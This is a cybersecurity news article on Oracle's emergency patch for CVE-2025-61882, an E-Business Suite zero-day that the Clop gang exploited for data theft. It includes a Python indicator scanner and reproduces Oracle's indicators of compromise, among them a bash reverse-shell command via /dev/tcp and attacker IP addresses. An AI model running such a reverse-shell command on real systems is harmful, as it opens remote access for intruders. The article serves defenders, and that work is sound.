EBS Zero-day exploited in Clop Data Theft Attack Patched by Oracle


“The EBS zero-day, which was exploited in the Clop data theft attacks, has now been patched by Oracle.”

Oracle is alerting customers to a serious E-Business Suite zero-day vulnerability, tracked as CVE-2025-61882, that enables unauthenticated remote code execution. The flaw is being actively exploited in Clop data theft attacks.

The vulnerability, in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration), carries a CVSS base score of 9.8 because it is easy to exploit and requires no authentication.

Oracle Advisory

“The Oracle E-Business Suite vulnerability CVE-2025-61882 is addressed by this security alert.”


“This vulnerability can be remotely exploited without authentication, meaning that a username and password are not required to exploit it over a network. This vulnerability could lead to remote code execution if it is successfully exploited.”

Oracle has issued an emergency update to fix the zero-day vulnerability, which has been confirmed to affect Oracle E-Business Suite versions 12.2.3 through 12.2.14. According to the company, customers must first install the October 2023 Critical Patch Update before they can apply the new security updates.

Because a public PoC exploit exists and the vulnerability is being actively exploited, Oracle administrators should install the security update as soon as possible.


Zero-day exploited in Clop data theft attacks

Although Oracle has not said outright that this is a zero-day vulnerability, it has shared indicators of compromise that match an Oracle EBS exploit that threat actors recently posted on Telegram.

The Clop ransomware group used this vulnerability in their August 2025 data theft activities, according to Charles Carmakal, CTO of Mandiant, a division of Google Cloud.


In August 2025, Carmakal told BleepingComputer, “Clop exploited multiple vulnerabilities in Oracle EBS, which enabled them to steal large amounts of data from several victims.”


“Several vulnerabilities were exploited, including one that was fixed this weekend (CVE-2025-61882) and another that was fixed in Oracle’s July 2025 update,” Carmakal added.


CVE-2025-61882 is a critical (CVSS 9.8) vulnerability that permits unauthenticated remote code execution.

News of Clop’s latest extortion campaign first surfaced last week, when Mandiant and the Google Threat Intelligence Group (GTIG) announced that they were tracking a new campaign in which several companies received emails purporting to come from the threat actors.

According to these emails, Clop had stolen data from the companies’ Oracle E-Business Suite systems and was demanding a ransom to keep the data private.


“The CL0P crew is who we are. You can Google us online if you haven’t heard of us,” states the extortion email published by BleepingComputer.


“We just stole numerous documents from your Oracle E-Business Suite application. Our systems now house all of the private files and other data.”

Oracle initially linked the Clop extortion campaign to vulnerabilities that were fixed in July 2025, rather than to the new zero-day that we now know was used in the attacks.

Oracle has now disclosed indicators of compromise for the zero-day exploitation, including the exploit archive and its component files, the command used to launch a reverse shell, and two IP addresses observed in exploitation attempts.

  • 200[.]107[.]207[.]26 – IP address associated with observed exploitation. (HTTP GET and POST requests)
  • 185[.]181[.]60[.]11 – IP address associated with observed exploitation. (HTTP GET and POST requests)
  • sh -c /bin/bash -i >& /dev/tcp// 0>&1 – Command executed by exploit to open a reverse shell.
  • 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (Exploit archive)
  • aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py (Part of exploit)
  • 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py (Part of exploit)
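The indicators above are only useful if they are actually checked against telemetry. The following Python script is an added example written for this article, not code from Oracle or from any of the parties mentioned: it de-fangs the two published IP addresses and matches them against web server access-log lines, and it compares file digests against the three published SHA-256 values. The log lines and the sample file contents are constructed for illustration; the log format assumed is the common Apache/NCSA layout, which is an assumption about the reader's environment.

```python
import hashlib
import re

# Indicators published by Oracle for CVE-2025-61882, copied from the advisory
# as reproduced above. The IPs are written de-fanged ("[.]") as published.
IOC_IPS_DEFANGED = ["200[.]107[.]207[.]26", "185[.]181[.]60[.]11"]
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d":
        "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121": "exp.py",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b": "server.py",
}


def defang(ip: str) -> str:
    """Turn a de-fanged indicator like 1[.]2[.]3[.]4 back into a comparable IP."""
    return ip.replace("[.]", ".")


IOC_IPS = {defang(ip) for ip in IOC_IPS_DEFANGED}

# Assumed log layout: NCSA common/combined format, client IP first,
# timestamp in brackets, then "METHOD /path HTTP/x.y" in quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)'
)


def scan_access_log(lines):
    """Return one record per log line whose client IP is a published IoC.

    Lines that do not parse are skipped rather than raising, so a partially
    corrupted log does not abort the whole scan.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m.group("ip") in IOC_IPS:
            hits.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "method": m.group("method"),
                "path": m.group("path"),
            })
    return hits


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path: str) -> str:
    """Stream a file through SHA-256 so large archives do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def match_hashes(named_digests):
    """Given (name, sha256hex) pairs, return those whose digest is a known IoC."""
    return [
        (name, IOC_SHA256[digest.lower()])
        for name, digest in named_digests
        if digest.lower() in IOC_SHA256
    ]


# Constructed sample log lines; the request paths are placeholders, not EBS URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Oct/2025:10:14:58 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '200.107.207.26 - - [04/Oct/2025:10:15:01 +0000] "GET /example/endpoint HTTP/1.1" 200 512',
    'this line is not in access-log format and is skipped',
    '185.181.60.11 - - [04/Oct/2025:10:15:07 +0000] "POST /example/endpoint HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("IoC IP hit:", hit)
    # Constructed file content; its digest is not expected to match anything.
    sample = [("upload.bin", sha256_of_bytes(b"hello"))]
    print("hash matches:", match_hashes(sample))
```

In practice you would feed `scan_access_log` the web tier's access logs for the period since early August 2025 (the earliest exploitation date mentioned above) and run `sha256_of_file` over any unexpected files found under the application's writable directories, passing the results to `match_hashes`. A hit on either list is a reason to open an incident, not merely to patch.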


Exploit leaked by Scattered Lapsus$ Hunters

While Clop is responsible for exploiting the Oracle zero-day in its data theft attacks, the zero-day was first made public by a different group of threat actors, one that has recently made headlines for its extensive data theft attacks against Salesforce customers.

These actors, who call themselves “Scattered Lapsus$ Hunters” and claim to be made up of threat actors from ShinyHunters, Lapsus$, and Scattered Spider, posted two files on Telegram on Friday that they said had nothing to do with the Clop attacks.

One file, named “GIFT_FROM_CL0P.7z”, contains what appears to be Oracle source code; judging by the file names, it is associated with “support.oracle.com”.

The threat actors also released an archive named “ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip”, whose filename implied it was the Oracle E-Business Suite exploit used by Clop.

According to BleepingComputer, this is the same file that appears in Oracle’s indicators of compromise.

The archive contains two Python scripts, exp.py and server.py, plus an instruction file named readme.md. Run against a vulnerable Oracle E-Business Suite instance, these scripts can either open a reverse shell to the threat actor’s servers or execute an arbitrary command.

Because Oracle’s IOCs name the very exploit archive shared by Scattered Lapsus$ Hunters, it is now established that the Clop ransomware gang has been using this exploit.

This does, however, raise questions about how the Scattered Lapsus$ Hunters threat actors obtained access to the exploit and whether they are collaborating with Clop.

BleepingComputer reached out to ShinyHunters and Clop to ask about this relationship but had not heard back at the time of writing.


About The Author

Suraj Koli is a content specialist who writes about cybersecurity and information security. He has written many articles on cybersecurity concepts and the latest trends in cyber awareness and ethical hacking.
